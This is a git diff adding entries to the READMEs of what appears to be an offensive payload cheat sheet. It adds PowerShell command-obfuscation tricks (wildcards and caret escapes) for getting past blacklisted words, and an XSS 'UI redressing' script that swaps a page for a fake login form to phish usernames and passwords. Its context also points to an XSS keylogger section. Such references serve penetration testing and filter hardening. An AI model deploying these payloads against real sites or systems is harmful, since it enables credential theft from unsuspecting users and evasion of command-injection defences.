diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 38d3589..828a481 100644
--- a/Remote commands execution/README.md	
+++ b/Remote commands execution/README.md	
@@ -110,6 +110,12 @@ cat ${test//hhh\/hm/}
 cat ${test//hh??hm/}
 ```
 
+Bypass blacklisted word with wildcards
+```powershell
+powershell C:\*\*2\n??e*d.*? # notepad
+@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
+```
+
 Bypass zsh/bash/sh blacklist
 
 ```powershell
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 781975e..9df2b3e 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -33,6 +33,15 @@ fclose($fp);
 ?>
 ```
 
+UI redressing (Sophisticated phishing)
+
+```html
+<script>
+history.replaceState(null, null, '../../../login');
+document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
+</script>
+```
+
 Keylogger for XSS
 
 ```javascript